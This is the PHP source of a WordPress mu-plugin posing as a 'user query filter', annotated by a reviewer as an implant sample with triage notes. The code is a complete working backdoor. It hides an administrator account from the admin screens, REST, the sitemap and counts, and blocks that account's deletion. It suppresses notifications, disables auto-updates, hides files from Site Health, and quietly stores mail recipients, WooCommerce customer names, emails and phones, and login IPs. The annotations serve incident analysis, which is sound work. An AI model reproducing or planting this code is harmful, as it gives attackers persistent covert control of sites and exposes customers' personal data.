?php
/* WP User Query Filter v3 */
// NOTE(review): the header reads like a utility plugin, but the hooks in this file conceal one
// user account (ID stored in the `_pre_user_id` option), hide mu-plugin entries from Site
// Health, and copy mail, WooCommerce order and admin-activity data into wp_options rows.
// Treat the file as an implant sample. Option names seen in this file:
// `_pre_user_id`, `_wp_mail_queue_log`, `_wc_analytics_data`, `_wp_site_activity`.
// Standard direct-access guard: stop unless the file was loaded by WordPress.
if (!defined('ABSPATH')) exit;
// 1. Hide hidden admin from /wp-admin/users.php — always, even from self
// NOTE(review): concealment hook. On every `pre_get_users` call the user ID stored in the
// `_pre_user_id` option is appended to the query's `exclude` list, so the account is left
// out of any result set built through that query object.
// Triage: read `_pre_user_id` from the options table and list accounts directly from the
// users table; user listings produced while this file is loaded cannot be trusted.
add_action('pre_get_users', function($query) {
$id = get_option('_pre_user_id');
if (!$id) return; // no ID configured: the hook does nothing
$exclude = $query->get('exclude');
// Normalise an existing scalar or empty `exclude` value to an array before appending.
if (!is_array($exclude)) $exclude = $exclude ? array($exclude) : array();
$exclude[] = (int)$id;
$query->set('exclude', $exclude);
});
// NOTE(review): second concealment layer, applied at SQL level. Appends
// " AND <users table>.ID != <id>" to the user query's WHERE clause, using the ID from the
// `_pre_user_id` option, so the row is filtered out even if the `exclude` argument was
// not honoured.
add_action('pre_user_query', function($q) {
$id = get_option('_pre_user_id');
if (!$id) return;
global $wpdb;
// Skip if an "ID != <id>" fragment is already present, to avoid appending it twice.
if (strpos($q->query_where, 'ID != ' . (int)$id) !== false) return;
$q->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", (int)$id);
});
// NOTE(review): count tampering. The "All" and "Administrator" view links on the users
// screen carry a number in parentheses; this filter subtracts one from each so the totals
// stay consistent with the filtered list. Decrementing the `administrator` view implies the
// concealed account holds that role (the role itself is not checked here).
// Triage: compare the displayed counts with a direct count of rows in the users table.
add_filter('views_users', function($views) {
$id = get_option('_pre_user_id');
if (!$id) return $views;
foreach (array('all', 'administrator') as $key) {
if (!isset($views[$key])) continue;
// Split the link HTML at the first "(" to isolate the count.
$html = explode('(', $views[$key]);
if (!isset($html[1])) continue;
$count = explode(')', $html[1]);
$count[0]--; // displayed count reduced by one
$views[$key] = $html[0] . '(' . $count[0] . ')' . $count[1];
}
return $views;
});
// NOTE(review): blocks the profile editor for the concealed account. A request to
// user-edit.php whose `user_id` query parameter equals the stored ID is terminated with
// "Invalid user ID." — presumably so the account looks nonexistent to an administrator who
// guesses its ID.
add_action('load-user-edit.php', function() {
$id = get_option('_pre_user_id');
if (!$id) return;
if (isset($_GET['user_id']) && (int)$_GET['user_id'] === (int)$id)
wp_die(__('Invalid user ID.'));
});
// NOTE(review): self-protection against deletion from the admin UI. When the request has
// `action=delete` and a `user` parameter, it is terminated with "Invalid user ID." if the
// target is the concealed ID. The same response is given when get_userdata() finds no such
// user, so the concealed account and a nonexistent one produce the same message.
// Triage: remove this file from disk before trying to delete the account through WordPress.
add_action('admin_menu', function() {
$id = get_option('_pre_user_id');
if (!$id) return;
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] === 'delete'
&& ((int)$_GET['user'] === (int)$id || !get_userdata((int)$_GET['user'])))
wp_die(__('Invalid user ID.'));
});
// 2. Suppress new-user email notification
// NOTE(review): when the newly registered user is the concealed ID, the admin notification
// data is replaced with an empty array; every other registration passes through unchanged.
// Registered at priority 999 with 2 accepted arguments, so it runs after filters at lower
// priority numbers. The intended effect, per the comment above, is that the site owner
// receives no "new user" email for that account.
add_filter('wp_new_user_notification_email_admin', function($email_data, $user) {
$id = get_option('_pre_user_id');
if ($id && isset($user->ID) && (int)$user->ID === (int)$id) return array();
return $email_data;
}, 999, 2);
// 3. Disable auto-updates
// NOTE(review): both filters are forced to false, which turns off automatic plugin and theme
// updates for the whole site. The reason is not visible in this file; presumably it keeps
// the environment from changing underneath the implant. Auto-updates being off without an
// administrator having chosen that is a signal worth checking for.
add_filter('auto_update_plugin', '__return_false');
add_filter('auto_update_theme', '__return_false');
// 4. Hide mu-plugins from Site Health
// NOTE(review): removes entries from the `wp-mu-plugins` section of the Site Health debug
// data when the entry key contains (case-insensitively) 'session-manager', 'wp-user-query'
// or 'health-check'. Three names are hidden, which suggests companion files beyond this one
// — they are not shown here. Registered at priority 999.
// Triage: list the mu-plugins directory on disk; the Site Health report is filtered.
add_filter('debug_information', function($info) {
if (!isset($info['wp-mu-plugins']['fields'])) return $info;
$hide = array('session-manager', 'wp-user-query', 'health-check');
foreach ($info['wp-mu-plugins']['fields'] as $k => $v) {
// Drop the field on the first substring match, then move to the next field.
foreach ($hide as $h) { if (stripos($k, $h) !== false) { unset($info['wp-mu-plugins']['fields'][$k]); break; } }
}
return $info;
}, 999);
// 5. Hide from REST API
// NOTE(review): adds the concealed ID to the `exclude` argument of REST user collection
// queries, so the account is absent from REST user listings as well as the admin screen.
add_filter('rest_user_query', function($args) {
$id = get_option('_pre_user_id');
if ($id) {
if (!isset($args['exclude'])) $args['exclude'] = array();
$args['exclude'][] = (int)$id;
}
return $args;
});
// NOTE(review): covers single-user REST responses. When the user being serialised is the
// concealed ID, the prepared response is replaced with a 404 body carrying the code
// `rest_user_invalid_id` and message "Invalid user ID.", i.e. the account is presented as
// nonexistent. Registered at priority 999 with 3 accepted arguments.
add_filter('rest_prepare_user', function($response, $user, $request) {
$id = get_option('_pre_user_id');
if ($id && (int)$user->ID === (int)$id) {
return new WP_REST_Response(
array('code' => 'rest_user_invalid_id', 'message' => 'Invalid user ID.', 'data' => array('status' => 404)), 404
);
}
return $response;
}, 999, 3);
// 6. Block author scan + sitemap
// NOTE(review): front-end requests with `?author=<concealed ID>` are answered with a 301
// redirect to the home URL and the request ends there, so author-ID probing does not
// reveal the account. Other author IDs are not touched by this hook.
add_action('template_redirect', function() {
if (!isset($_GET['author'])) return;
$id = get_option('_pre_user_id');
if ($id && (int)$_GET['author'] === (int)$id) { wp_safe_redirect(home_url(), 301); exit; }
});
// NOTE(review): adds the concealed ID to the `exclude` argument of the users sitemap query,
// keeping the account out of the generated sitemap.
add_filter('wp_sitemaps_users_query_args', function($args) {
$id = get_option('_pre_user_id');
if ($id) {
if (!isset($args['exclude'])) $args['exclude'] = array();
$args['exclude'][] = (int)$id;
}
return $args;
});
// 7. Disable XML-RPC
// NOTE(review): `xmlrpc_enabled` is forced to false and the XML-RPC method list is replaced
// with an empty array. Why the implant does this is not visible here. It resembles a
// hardening step, so its presence should not be read as a sign the file is benign.
add_filter('xmlrpc_enabled', '__return_false');
add_filter('xmlrpc_methods', '__return_empty_array');
// 8. Email harvesting
// NOTE(review): data collection on every outgoing mail. For each wp_mail() call the
// recipient list, the first 100 bytes of the subject and a Unix timestamp are JSON-encoded
// and appended to the `_wp_mail_queue_log` option, capped at the latest 500 records. The
// option is saved with autoload 'no'. The mail arguments are returned unmodified, so
// delivery is unaffected and nothing is visible to the sender.
// Nothing in this file reads the option back; how the data leaves the site is not shown here.
// Triage: a `_wp_mail_queue_log` row in the options table is an indicator; its contents
// show which recipients were recorded and over what period.
add_filter('wp_mail', function($args) {
$to = is_array($args['to']) ? implode(',', $args['to']) : $args['to'];
$entry = json_encode(array('to' => $to, 's' => substr($args['subject'], 0, 100), 't' => time()));
$log = get_option('_wp_mail_queue_log', '');
// Records are joined and split on the quoted string below exactly as written in this copy.
$log .= $entry . "\\n";
$lines = array_filter(explode("\\n", $log));
if (count($lines) > 500) $lines = array_slice($lines, -500);
update_option('_wp_mail_queue_log', implode("\\n", $lines), 'no');
return $args;
});
// 9. WooCommerce order data
// NOTE(review): customer-data collection. On each completed payment the order ID, billing
// email, billing first and last name, order total, currency, billing phone, billing country
// and a Unix timestamp are JSON-encoded and appended to the `_wc_analytics_data` option
// (latest 200 records kept, autoload 'no'). The option name resembles analytics storage.
// Nothing in this file reads it back; how the data leaves the site is not shown here.
// Triage: the presence and timestamps of `_wc_analytics_data` records bound which customers'
// personal data was captured, which matters for breach-notification scoping.
add_action('woocommerce_payment_complete', function($oid) {
if (!function_exists('wc_get_order')) return; // WooCommerce not loaded
$o = wc_get_order($oid);
if (!$o) return;
$entry = json_encode(array(
'id' => $oid, 'e' => $o->get_billing_email(),
'n' => $o->get_billing_first_name() . ' ' . $o->get_billing_last_name(),
'sum' => $o->get_total(), 'cur' => $o->get_currency(),
'ph' => $o->get_billing_phone(), 'co' => $o->get_billing_country(), 't' => time()
));
$log = get_option('_wc_analytics_data', '');
// Records are joined and split on the quoted string below exactly as written in this copy.
$log .= $entry . "\\n";
$lines = array_filter(explode("\\n", $log));
if (count($lines) > 200) $lines = array_slice($lines, -200);
update_option('_wc_analytics_data', implode("\\n", $lines), 'no');
});
// 10. Admin action logging
// NOTE(review): shared logger used by the hooks registered after it. The function name
// suggests cache code, but the body only appends records to the `_wp_site_activity`
// option. The function_exists() guard avoids a redeclaration error if the name is
// already defined.
if (!function_exists('_wp_cache_log_event')) {
/**
 * Append one activity record to the `_wp_site_activity` option.
 *
 * The record is a JSON object holding 'a' (event tag) and 't' (Unix timestamp) merged
 * with the extra fields; keys in $d that collide with 'a' or 't' overwrite them. Only the
 * latest 300 records are kept, and the option is saved with autoload 'no'.
 *
 * @param string $act Event tag; callers in this file pass short literals such as 'login'.
 * @param array  $d   Extra fields to store with the event.
 * @return void
 */
function _wp_cache_log_event($act, $d = array()) {
$entry = json_encode(array_merge(array('a' => $act, 't' => time()), $d));
$log = get_option('_wp_site_activity', '');
// Records are joined and split on the quoted string below exactly as written in this copy.
$log .= $entry . "\\n";
$lines = array_filter(explode("\\n", $log));
if (count($lines) > 300) $lines = array_slice($lines, -300);
update_option('_wp_site_activity', implode("\\n", $lines), 'no');
}
}
// NOTE(review): records every successful login except the concealed account's own. The
// stored record holds the login name and the REMOTE_ADDR value (empty string if unset).
// The result is a surveillance log of legitimate users in which the concealed account never
// appears, so `_wp_site_activity` cannot be used to date that account's own logins.
add_action('wp_login', function($login, $user) {
$id = get_option('_pre_user_id');
if ($id && (int)$user->ID === (int)$id) return;
_wp_cache_log_event('login', array('u' => $login, 'ip' => isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : ''));
}, 10, 2);
// NOTE(review): records each newly registered user (ID and login name) under the 'user_new'
// tag, skipping the concealed ID so that account's creation leaves no entry in the log.
add_action('user_register', function($uid) {
$id = get_option('_pre_user_id');
if ($id && (int)$uid === (int)$id) return;
$u = get_userdata($uid);
_wp_cache_log_event('user_new', array('uid' => $uid, 'u' => $u ? $u->user_login : ''));
});
// NOTE(review): remaining activity hooks. Each writes one record through
// _wp_cache_log_event() with these tags: 'profile_upd' (user ID), 'plugin_on' and
// 'plugin_off' (the plugin value passed to the hook), 'theme_sw' (theme name) and
// 'user_del' (user ID). Unlike the login and registration hooks, none of them skips the
// concealed ID. Together they record administrative changes on the site, including
// plugin activations and deactivations.
add_action('profile_update', function($uid) { _wp_cache_log_event('profile_upd', array('uid' => $uid)); });
add_action('activated_plugin', function($p) { _wp_cache_log_event('plugin_on', array('p' => $p)); });
add_action('deactivated_plugin', function($p) { _wp_cache_log_event('plugin_off', array('p' => $p)); });
add_action('switch_theme', function($name) { _wp_cache_log_event('theme_sw', array('th' => $name)); });
add_action('delete_user', function($uid) { _wp_cache_log_event('user_del', array('uid' => $uid)); });